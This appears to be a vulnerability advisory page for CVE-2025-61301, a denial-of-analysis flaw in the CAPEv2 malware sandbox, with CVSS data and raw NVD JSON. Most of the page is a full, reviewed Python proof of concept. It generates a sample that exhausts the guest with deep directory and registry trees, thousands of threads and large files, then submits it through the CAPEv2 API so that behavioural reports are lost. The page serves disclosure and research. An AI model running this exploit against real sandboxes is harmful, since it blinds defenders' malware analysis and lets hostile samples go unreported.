Security Vulnerability Report
CVE-2025-61301 CVSS 7.5 HIGH

CVE-2025-61301

Published: 2025-10-20 21:15:38
Last Modified: 2026-04-15 00:35:42

Description

Denial-of-analysis in reporting/mongodb.py and reporting/jsondump.py in CAPEv2 (commit 52e4b43, on 2025-05-17) allows attackers who can submit samples to cause incomplete or missing behavioral analysis reports by generating deeply nested or oversized behavior data that trigger MongoDB BSON limits or orjson recursion errors when the sample executes in the sandbox. Only the ability to submit a sample is required; the impact is loss of the behavioral report for the affected task (availability of the analysis, per the C:N/I:N/A:H vector), not compromise of the CAPE host itself.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

CAPEv2 at commit 52e4b43 (2025-05-17) and earlier versions.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it only against CAPEv2 instances you own or are explicitly permitted to test; the generated sample deliberately exhausts guest resources (deep directory/registry trees, thousands of threads, ~100 MB of temp files) and must never be executed outside a disposable sandbox VM.
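# CVE-2025-61301 PoC - Denial-of-Analysis via Oversized/Deeply Nested Behavior Data
#
# Demonstrates how a crafted sample can trigger MongoDB BSON limits or orjson
# recursion errors in CAPEv2's reporting modules (reporting/mongodb.py,
# reporting/jsondump.py), leaving the task with an incomplete or missing
# behavioral report.
#
# Authorized testing only: the generated sample is deliberately abusive to the
# guest VM it runs in. Point it only at CAPEv2 instances you own or are
# explicitly permitted to test, and only at disposable analysis guests.
import os
import tempfile
import textwrap

# CAPEv2 web submission API endpoint. Target and token are read from the
# environment so they never have to be edited into (and committed with) this
# file; the literal defaults match the original PoC.
CAPEV2_URL = os.environ.get(
    "CAPEV2_URL", "http://target-capev2:8000/apiv2/tasks/create/file/"
)
API_TOKEN = os.environ.get("CAPEV2_API_TOKEN", "your_api_token_here")
# NOTE(review): CAPEv2's REST API is documented as DRF token authentication
# ("Authorization: Token <token>"). "Bearer" is kept as the default only
# because that is what the original PoC sent; set CAPEV2_AUTH_SCHEME=Token if
# the target answers 401 -- confirm against the target's settings.
AUTH_SCHEME = os.environ.get("CAPEV2_AUTH_SCHEME", "Bearer")
# Upload timeout in seconds. Without one a stalled or filtered target hangs
# the PoC forever.
REQUEST_TIMEOUT = float(os.environ.get("CAPEV2_TIMEOUT", "60"))

# Source of the sample that runs inside the sandbox guest, kept as a module
# constant so it can be inspected and syntax-checked without writing a file.
# The guest needs a Python interpreter of its own: CAPE only hands the file to
# the analysis VM, it does not supply one.
#
# Fixes relative to the original PoC: `tempfile` was used by
# generate_large_files() but never imported (NameError before the large files
# were written), the unused `sys` import and dead `key_path` variable are gone,
# bare `except:` clauses are narrowed to OSError, and running out of threads
# no longer aborts the run before the remaining strategies execute.
SAMPLE_CODE = textwrap.dedent(
    '''\
    import os
    import tempfile
    import threading
    import time


    def create_deep_directories(base_path, depth):
        """Create deeply nested directories to trigger deep path monitoring."""
        current = base_path
        for i in range(depth):
            current = os.path.join(
                current, f"level_{i}_padding_to_increase_path_length_{'A' * 50}"
            )
            try:
                os.makedirs(current, exist_ok=True)
            except OSError:
                # MAX_PATH / ENAMETOOLONG: the path is already deep enough to
                # matter; keep going so the remaining levels are still
                # attempted (and logged by the monitor).
                pass


    def spawn_many_threads(count):
        """Spawn many threads to generate excessive API call logs."""
        threads = []
        for _ in range(count):
            t = threading.Thread(target=lambda: time.sleep(60))
            t.daemon = True
            try:
                t.start()
            except RuntimeError:
                # "can't start new thread": the guest is out of thread/memory
                # budget, which is the point -- stop here instead of crashing
                # before the other strategies run.
                break
            threads.append(t)
        return threads


    def create_deep_registry_keys(depth):
        """Create deeply nested registry keys (Windows only; no-op elsewhere)."""
        try:
            import winreg
        except ImportError:
            return
        # Anchor the chain under HKCU\\Software\\CAPEv2_Test rather than
        # littering the HKCU root (the original computed this path but
        # never used it).
        try:
            current_key = winreg.CreateKey(
                winreg.HKEY_CURRENT_USER, r"Software\\CAPEv2_Test"
            )
        except OSError:
            return
        for i in range(depth):
            try:
                current_key = winreg.CreateKey(current_key, f"SubKey_{i}_{'X' * 30}")
            except OSError:
                # Key-name/path limits reached; the tree is as deep as the
                # guest allows.
                break


    def generate_large_files(count, size_mb):
        """Generate large files to increase behavior log size."""
        data = b"A" * (1024 * 1024)  # 1MB of data
        for i in range(count):
            path = os.path.join(tempfile.gettempdir(), f"large_file_{i}.dat")
            with open(path, "wb") as f:
                for _ in range(size_mb):
                    f.write(data)


    if __name__ == "__main__":
        # Strategy 1: Create deeply nested directories (depth > 1000)
        create_deep_directories(os.path.expanduser("~"), 1500)
        # Strategy 2: Spawn excessive threads (triggers API log overflow)
        spawn_many_threads(5000)
        # Strategy 3: Create deeply nested registry keys (Windows)
        create_deep_registry_keys(1500)
        # Strategy 4: Generate large files to exceed BSON 16MB limit
        generate_large_files(20, 5)
        print("Sample execution complete")
    '''
)


def create_malicious_sample(output_dir=None):
    """Write the sandbox sample to disk and return its path.

    When executed in the CAPEv2 guest the sample produces deeply nested or
    oversized behavior data (deep directory/registry trees, thousands of
    threads, ~100 MB of temp files) that the reporting modules fail to store.

    Args:
        output_dir: Directory to write the sample into. Defaults to the
            system temp directory, as in the original PoC.

    Returns:
        Path of the written ``cve_2025_61301_sample.py``.
    """
    sample_path = os.path.join(
        output_dir or tempfile.gettempdir(), "cve_2025_61301_sample.py"
    )
    with open(sample_path, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CODE)
    return sample_path


def extract_task_ids(payload):
    """Return the task id(s) found in a CAPEv2 submission response, or [].

    Accepts the flat ``{"task_id": N}`` shape the original PoC expected as
    well as ``{"task_ids": [...]}`` and the nested
    ``{"data": {"task_ids": [...]}}`` shape CAPEv2's apiv2 is believed to
    return (NOTE(review): confirm against the target's api.py). Any other
    input, including a non-dict payload, yields an empty list.
    """
    if not isinstance(payload, dict):
        return []
    if payload.get("task_id") is not None:
        return [payload["task_id"]]
    ids = payload.get("task_ids")
    if ids is None and isinstance(payload.get("data"), dict):
        ids = payload["data"].get("task_ids")
    if isinstance(ids, list):
        return list(ids)
    return [ids] if ids is not None else []


def submit_to_capev2(sample_path, timeout=REQUEST_TIMEOUT):
    """Upload ``sample_path`` to CAPEv2 and print the resulting task id(s).

    Args:
        sample_path: Path of the file to submit.
        timeout: Seconds to wait for the upload/response before giving up.

    Returns:
        The list of task ids parsed from the response; empty when the
        submission failed, was rejected, or carried no id.
    """
    # Imported here so the sample generator and response parser stay usable
    # (and testable) without `requests` installed.
    import requests

    headers = {"Authorization": f"{AUTH_SCHEME} {API_TOKEN}"}
    with open(sample_path, "rb") as fh:
        files = {
            "file": (os.path.basename(sample_path), fh, "application/octet-stream")
        }
        try:
            response = requests.post(
                CAPEV2_URL, files=files, headers=headers, timeout=timeout
            )
        except requests.RequestException as exc:
            # Connection refused / timeout / TLS error: report instead of
            # surfacing a traceback from inside the `with`.
            print(f"[-] Submission failed: {exc}")
            return []

    if response.status_code != 200:
        print(f"[-] Submission failed: {response.status_code}")
        return []

    try:
        payload = response.json()
    except ValueError:
        payload = None
    # CAPEv2 can answer HTTP 200 with an application-level error object;
    # the original PoC reported that as a success.
    if isinstance(payload, dict) and payload.get("error"):
        print(f"[-] Submission rejected by CAPEv2: {payload}")
        return []

    task_ids = extract_task_ids(payload)
    shown = task_ids[0] if len(task_ids) == 1 else (task_ids or None)
    print(f"[+] Sample submitted successfully. Task ID: {shown}")
    print("[!] The analysis report will be incomplete or missing due to CVE-2025-61301")
    return task_ids


def main():
    """Generate the sample, submit it, and always remove the local copy."""
    sample = create_malicious_sample()
    try:
        submit_to_capev2(sample)
    finally:
        # The original removed the file only on the happy path, so a failed
        # upload left the sample behind in the temp directory.
        os.remove(sample)


if __name__ == "__main__":
    main()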

References

Raw JSON Data

{"cve": {"id": "CVE-2025-61301", "sourceIdentifier": "[email protected]", "published": "2025-10-20T21:15:38.203", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Denial-of-analysis in reporting/mongodb.py and reporting/jsondump.py in CAPEv2 (commit 52e4b43, on 2025-05-17) allows attackers who can submit samples to cause incomplete or missing behavioral analysis reports by generating deeply nested or oversized behavior data that trigger MongoDB BSON limits or orjson recursion errors when the sample executes in the sandbox."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "http://capev2.com", "source": "[email protected]"}, {"url": "https://github.com/eGkritsis/CVE-2025-61301", "source": "[email protected]"}, {"url": "https://github.com/kevoreilly/CAPEv2", "source": "[email protected]"}]}}